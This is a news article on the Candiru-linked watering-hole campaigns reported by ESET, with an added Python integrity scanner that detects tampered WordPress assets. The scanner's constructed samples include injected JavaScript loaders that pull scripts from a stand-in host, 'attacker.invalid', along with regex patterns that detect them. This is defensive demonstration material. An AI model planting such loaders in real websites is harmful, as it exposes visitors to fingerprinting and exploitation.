Israeli spyware vendor Candiru, which was added to a U.S. government economic blocklist this month, is said to have waged "watering hole" attacks against high-profile entities in the U.K. and the Middle East, new findings reveal.
"The victimized websites belong to media outlets in the U.K., Yemen, and Saudi Arabia, as well as to Hezbollah; to government institutions in Iran (Ministry of Foreign Affairs), Syria (including the Ministry of Electricity), and Yemen (including the Ministries of Interior and Finance); to internet service providers in Yemen and Syria; and to aerospace/military technology companies in Italy and South Africa," ESET said in a new report. "The attackers also created a website mimicking a medical trade fair in Germany."
The strategic web compromises are believed to have occurred in two waves: the first commencing as early as March 2020 and ending in August 2020, and the second beginning in January 2021 and lasting until early August 2021, when the targeted websites were stripped clean of the malicious scripts.
Watering hole attacks are a highly targeted form of intrusion: they aim to infect a specific group of end users by backdooring websites that members of the group are known to frequent, with the goal of opening a gateway into their machines for follow-on exploitation.
"The compromised websites are only used as a jumping-off point to reach the final targets," the Slovak cybersecurity firm said, linking the second wave to a threat actor tracked by Kaspersky as Karkadann, citing overlaps in tactics, techniques, and procedures (TTPs). The Russian company has described the group as targeting government bodies and news outlets in the Middle East since at least October 2020.
The original attack chains involved injecting into the websites JavaScript code, loaded from a remote attacker-controlled domain, that was designed to collect and exfiltrate IP geolocation and system information about the victim machine, proceeding further only if the operating system in question was either Windows or macOS. This suggests the campaign was orchestrated to target computers rather than mobile devices. The final step led to a likely browser remote code execution exploit that enabled the attackers to hijack control of the machines.
The second wave, observed in January 2021, was characterized by more stealth: instead of adding the malicious code straight to the main HTML page, the attackers modified legitimate WordPress scripts ("wp-embed.min.js") used by the websites, using the tampered file to load a script from a server under their control. What's more, the fingerprinting script went beyond harvesting system metadata to capture the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins.
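Both waves described above hinge on the same thing a site owner can actually check for: a page or a shipped WordPress asset that has been altered to pull a script from an origin the site never used. The following is an added example, not code from ESET's report or from WordPress, of a defender-side integrity scan: it compares each served file against a baseline of SHA-256 hashes and, independently of the hash, flags any script loader or `<script src>` that points at a host outside an allow-list. The allow-list, the baseline, the file contents and the `attacker.invalid` host are all constructed for the demonstration; the stand-in for `wp-embed.min.js` is a placeholder, not the real minified file.

```python
import hashlib
import re
from dataclasses import dataclass
from pathlib import Path
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (constructed allow-list;
# a real deployment would populate it from the site's own templates).
ALLOWED_HOSTS = {"example-news.test", "cdn.example-news.test"}

# Two ways an injected loader typically pulls in remote code:
# a dynamic script element (`el.src = "https://..."`) or a static tag.
REMOTE_LOAD_PATTERNS = [
    re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)['"]"""),
    re.compile(r"""<script[^>]+src=['"](https?://[^'"]+)['"]""", re.IGNORECASE),
]


@dataclass
class Finding:
    path: str
    reason: str   # "not-in-baseline" | "hash-mismatch" | "foreign-script-load"
    detail: str = ""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def foreign_script_urls(content: str) -> list:
    """Return every remote script URL whose host is not on the allow-list."""
    urls = []
    for pattern in REMOTE_LOAD_PATTERNS:
        for match in pattern.finditer(content):
            url = match.group(1)
            host = urlparse(url).hostname or ""
            if host not in ALLOWED_HOSTS:
                urls.append(url)
    return urls


def check_file(path: str, content: bytes, baseline: dict) -> list:
    """Hash check against the baseline plus a content heuristic for foreign loaders."""
    findings = []
    digest = sha256_hex(content)
    expected = baseline.get(path)
    if expected is None:
        findings.append(Finding(path, "not-in-baseline", digest))
    elif expected != digest:
        findings.append(Finding(path, "hash-mismatch",
                                f"expected {expected[:12]}..., got {digest[:12]}..."))
    # Run the heuristic even when the hash matches: the baseline itself may
    # have been taken after a compromise, so a clean hash proves little on its own.
    for url in foreign_script_urls(content.decode("utf-8", errors="replace")):
        findings.append(Finding(path, "foreign-script-load", url))
    return findings


def scan(files: dict, baseline: dict) -> list:
    """Scan a {relative_path: bytes} mapping; sorted so output is deterministic."""
    findings = []
    for path in sorted(files):
        findings.extend(check_file(path, files[path], baseline))
    return findings


def load_tree(root: str, suffixes=(".js", ".html", ".php")) -> dict:
    """Read a real document root into the mapping `scan` expects (hypothetical helper)."""
    base = Path(root)
    return {str(p.relative_to(base)).replace("\\", "/"): p.read_bytes()
            for p in base.rglob("*") if p.is_file() and p.suffix in suffixes}


# --- Constructed sample content -------------------------------------------
CLEAN_WP_EMBED = (b"/*! placeholder standing in for wp-embed.min.js */\n"
                  b"!function(w,d){w.wp=w.wp||{};}(window,document);\n")
# Second-wave style: the legitimate file with a loader appended at the end.
TAMPERED_WP_EMBED = CLEAN_WP_EMBED + (
    b"var s=document.createElement('script');"
    b"s.src='https://attacker.invalid/fp.js';document.head.appendChild(s);\n")
CLEAN_INDEX = (b"<html><head><script src=\"https://cdn.example-news.test/app.js\">"
               b"</script></head><body>news</body></html>\n")
# First-wave style: a foreign script tag dropped straight into the page.
TAMPERED_INDEX = CLEAN_INDEX.replace(
    b"</head>", b"<script src=\"https://attacker.invalid/a.js\"></script></head>")

WP_EMBED_PATH = "wp-includes/js/wp-embed.min.js"
BASELINE = {WP_EMBED_PATH: sha256_hex(CLEAN_WP_EMBED),
            "index.html": sha256_hex(CLEAN_INDEX)}

if __name__ == "__main__":
    compromised = {WP_EMBED_PATH: TAMPERED_WP_EMBED, "index.html": TAMPERED_INDEX}
    for f in scan(compromised, BASELINE):
        print(f"{f.reason:20} {f.path}: {f.detail}")
```

The baseline would normally be generated from a known-good copy of the release (for WordPress core, from the official tarball of the installed version) and stored away from the web root, so that an attacker who can edit `wp-embed.min.js` cannot also edit the hashes. The allow-list heuristic catches the case the hash check cannot: a page that was never baselined, or a baseline that was captured too late.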
The exact exploit and the final payload delivered remain unknown as yet. "This shows that the operators choose to narrow the focus of their operations and that they don't want to burn their zero-day exploits," ESET malware researcher Matthieu Faou said.
The campaign's links to Candiru stem from the fact that some of the command-and-control servers used by the attackers resemble domains previously identified as belonging to the Israeli company, and from the company's known possession of browser-based remote code execution exploits, raising the possibility that "the operators of the watering holes are customers of Candiru."
ESET also noted that the attackers ceased operations at the end of July 2021, coinciding with public disclosures about Candiru's use of multiple zero-day vulnerabilities in the Chrome web browser to target victims located in Armenia. "It seems that the operators are taking a pause, probably in order to retool and make their campaign stealthier," Faou said. "We expect to see them back in the ensuing months."